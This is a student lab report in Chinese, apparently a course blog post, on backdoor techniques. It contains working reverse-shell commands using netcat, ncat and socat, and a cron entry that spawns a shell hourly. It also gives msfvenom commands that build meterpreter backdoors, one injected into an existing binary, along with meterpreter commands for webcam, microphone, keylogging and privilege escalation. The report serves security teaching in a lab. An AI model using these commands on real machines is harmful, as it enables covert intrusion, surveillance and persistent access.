20222305 2024-2025-1 《網路與系統攻防技術》實驗二實驗報告

20222305田青發表於2024-10-19

網路攻防實驗報告

姓名:田青

學號:20222305

實驗日期:2024/10/16 — 2024/10/23

實驗名稱:後門原理與實踐

指導教師:王志強


1.實驗內容

本週學習內容總結::

後門概念:不經過正常認證流程而訪問系統的通道。
後門型別:編譯器後門、作業系統後門、應用程式後門、潛伏於作業系統中或偽裝為特定應用的專用後門程式。
以及一些造成重大損失的案例。

實驗要求:

掌握後門原理及免殺技術
回答問題

(1)例舉你能想到的一個後門進入到你係統中的可能方式?
惡意軟體、利用未修補漏洞、遠端桌面協議(RDP)攻擊。
(2)例舉你知道的後門如何啟動起來(win及linux)的方式?
Win:惡意軟體安裝、登錄檔修改、任務排程、DLL注入;
Linux:shell指令碼、Cron任務、TCP、IP監聽。
(3)Meterpreter有哪些給你映像深刻的功能?
好多指令都需要特定格式,生成的檔案有時候不適配,必須要掌握好它才能發揮出全部實力。
(4)如何發現自己有系統有沒有被安裝後門?
使用Wireshark監控網路流量;使用msconfig檢查啟動項;使用工作管理員檢視程序。

2.實驗過程

2.1實踐目標

(1)使用netcat獲取主機操作Shell,cron啟動某項任務(任務自定)

PS:cron是linux下用來週期性的執行某種任務或等待處理某些事件的一個守護程序

(2)使用socat獲取主機操作Shell, 任務計劃啟動

(3)使用MSF meterpreter(或其他軟體)生成可執行檔案(後門),利用ncat或socat傳送到主機並執行獲取主機Shell

(4)使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容的後門,並嘗試提權

(5)使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell。

2.2實驗過程

2.2-1.1查詢主機IP與虛擬機器IP

注意:實驗分三次做完主機IP和虛擬機器IP都變過詳情見指令。
ipconfig
image
ifconfig
image

2.2-1.2下載ncat並配置環境

image

2.2-1.3Win獲得Linux Shell

windows開啟監聽:
ncat.exe -l -p 2305
Linux反彈連線win:
nc 192.168.31.102 2305 -e /bin/sh
image

windows下獲得一個linux shell,可執行任何指令,如ls:
ls
image

2.2-1.4 Linux獲得Win Shell(擴充)

Linux輸:
/var/www/html
再輸:
nc -l -p 2305
WIN:
ncat.exe -e cmd.exe 192.168.31.14 2305
Linux:
nc -l -p 2305
會出現:

點選檢視程式碼
Microsoft Windows [�汾 10.0.22631.4317]
(c) Microsoft Corporation����������Ȩ����

C:\Users\86136>
####2.2-1.5透過設定cron使得kali啟動定時任務 kali進入root `crontab -e`並選擇2:/usr/bin/vim.basic 點選i,並插入`30* * * * /bin/netcat 192.168.39.218 2305 -e /bin/sh`(輸入自己主機的IP地址,在每小時的第30分鐘啟動任務) 輸入`crontab -l`檢視時程表: ![image](https://img2024.cnblogs.com/blog/3528208/202410/3528208-20241019100824368-1105110578.png) 同時在Linux主機中的/var/spool/cron/crontabs檔案中會出現一個root檔案:

image
回到win,寫入檔案:
echo "* * * * * echo "tianqing" > /home/tq/20222305.txt" > /var/spool/cron/crontabs/root
image
查詢虛擬機器對應資料夾,發現修改成功
image

2.2-2.1使用socat獲取主機操作Shell, 任務計劃啟動

下載socat
image
win主機輸入:socat.exe tcp-listen:2305 exec:cmd.exe,pty,stderr
image
Linux輸:socat - tcp:192.168.39.218:2305
image

2.2-2.2準備程式

一個簡單的開啟edge瀏覽器程式碼

點選檢視程式碼
#include <stdlib.h>

int main() {
    // 使用 system 函式呼叫開啟 Edge 瀏覽器
    system("start msedge");

    return 0;
}

Win輸:schtasks /create /sc minute /mo 1 /tn "20222305" /tr C:\Users\86136\Desktop\20222305.exe
20222305:程序名
C:\Users\86136\Desktop\20222305.exe:檔案在主機的地址

2.2-2.3在命令列和計算機管理任務計劃程式中觀察到

image

image

2.2-3.1在Linux下使用MSF meterpreter生成可執行檔案,利用ncat或socat傳送到Windows主機並執行獲取主機shell

關閉防火牆和實時保護:
image
生成病毒檔案:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.14 LPORT=8888 -f exe > 2305backdoor.exe
LHOST=192.168.31.14是虛擬機器地址;
LPORT=8888是攻擊者的系統上監聽的埠號;
-f exe指定了生成的 payload 的格式,這裡是exe;
20222305backdoor.exe即生成的惡意可執行檔案
image

2.2-3.2將後門檔案傳輸至目標主機並將生成的後門檔案2305backdoor.exe傳給主機

win輸入:
ncat.exe -lv 8888 > "C:\Users\86136\Desktop\2305backdoor.exe"
image
Linux輸入:
nc 192.168.31.101 8888 < 2305backdoor.exe
在win桌面發現:
image

2.2-3.3配置監聽模組

回到虛擬機器輸入命令
msfconsole
進行配置:
use exploit/multi/handler(使用監聽模組,設定payload)
set payload windows/meterpreter/reverse_tcp (使用和生成後門程式時相同的payload)
set LHOST 192.168.31.14 (攻擊機的IP地址,和生成後門程式時指定的IP相同)
set LPORT 8888(監聽的埠)
接著輸入exploit,使監聽模組開始執行,並在Windows終端執行後門2305backdoor.exe檔案
回虛擬機器輸入ls
發現成功了
image

2.2-4.1使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權

獲取目標主機音訊、截圖、攝像頭、鍵盤記錄
在exploit模組中繼續輸入以下命令:
record_mic   (音訊)
screenshot   (截圖)
webcam_snap (拍照)
keyscan_start (開始讀取鍵盤記錄)
keyscan_dump (讀取鍵盤記錄結束)

image
螢幕截圖與鏡頭照片:
image

2.2-4.2提權

確保windows的cmd指令是使用管理員身份執行的,繼續在exploit模組中繼續輸入:
getuid (檢視當前使用者)
getsystem (提權指令)
image

2.2-5.1使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell

在虛擬機器中輸入:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.14 LPORT=8888 -x /home/tq/Desktop/pwn1 -f elf -o 20222305_pwn
命令詳解:
-p linux/x86/meterpreter/reverse_tcp:指定生成的有效載荷。
LHOST=192.168.31.14:設定反向連線的主機地址。
LPORT=8888:設定反向連線的埠。
-x /home/tq/Desktop/pwn1:指定要修改的現有可執行檔案的路徑。
-f elf:指定輸出格式為 ELF(Linux 可執行檔案)。
-o 20222305_pwn:指定輸出檔名。
對生成的20222305_pwn檔案賦予許可權:
chmod a+x 20222305_pwn
image

2.2-5.2重現監聽過程:

image
開啟另一個shell,執行生成的20222305_pwn檔案(需要使用root許可權)

2.2-5.3回到第一個shell,輸入ls確認連線,成功實現遠端控制shell

image

3.問題及解決方案

  • 問題1:無法輸入指令nc
    image

  • 問題1解決方案:nc不是windows下的指令,需要輸入ncat.exe來執行。

  • 問題2:uname命令無法使用

image

  • 問題2解決方案:在linux中用指令開啟檔案。

  • 問題3:拒絕連線
    image

  • 問題3解決方案:這是一個順序問題必須虛擬機器掛上指令後再連。

  • 問題4:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.14 LPORT=8888 -f exe > 2305backdoor.exe生成的2305backdoor.exe無法使用

  • 問題4解決方案:很多人都會去考慮架構問題,其實不然,關鍵在於許可權不夠,只要以管理員身份執行命令提示符就行。

  • 問題5:提權時連線超時
    image

  • 問題5解決方案:輸入sessions --interact 1 --timeout 60並等待一段時間。

  • 問題6:Msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.14
    LPORT=8888 -x /root/Desktop/pwn1 -f elf > 20222305_pwn中:“-x”用不了
    image

  • 問題6解決方案:改成命令“msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.14 LPORT=8888 -x /home/tq/Desktop/pwn1 -f elf -o 20222305_pwn”調整了“-x”格式。

4.學習感悟、思考等

遇到的困難和問題很多,與同學探討很多都找不到答案,但只需要用管理員身份執行或者關閉防火牆和實時病毒監控,按照指導書再做一遍就好了;很神奇,但也反映出來一件問題就是,只要駭客獲得電腦的最高許可權,你就在劫難逃,他可以很輕鬆的關閉所有防護,執行任何電腦上的程式,如入無人之境。我們一定要牢牢抓住主權,不要貪小便宜,落入社會工程攻擊的陷阱,否則就會淪為“階下囚”。同時透過這些實驗,我深入理解了如何利用多種工具進行滲透測試和後門建立。這不僅讓我認識到網路安全的複雜性,也讓我意識到實施這些技術的道德責任和法律後果。我們應當將這些技能應用於合法的安全測試和防禦,而不是用於惡意目的。同時,掌握這些技術也幫助我更好地理解如何保護系統免受這些攻擊。

參考資料

  • 《 0x21_MAL_後門原理與實踐.md》
  • 《20192415 2021-2022-2 《網路與系統攻防技術》實驗二實驗報告
    》學習指導

相關文章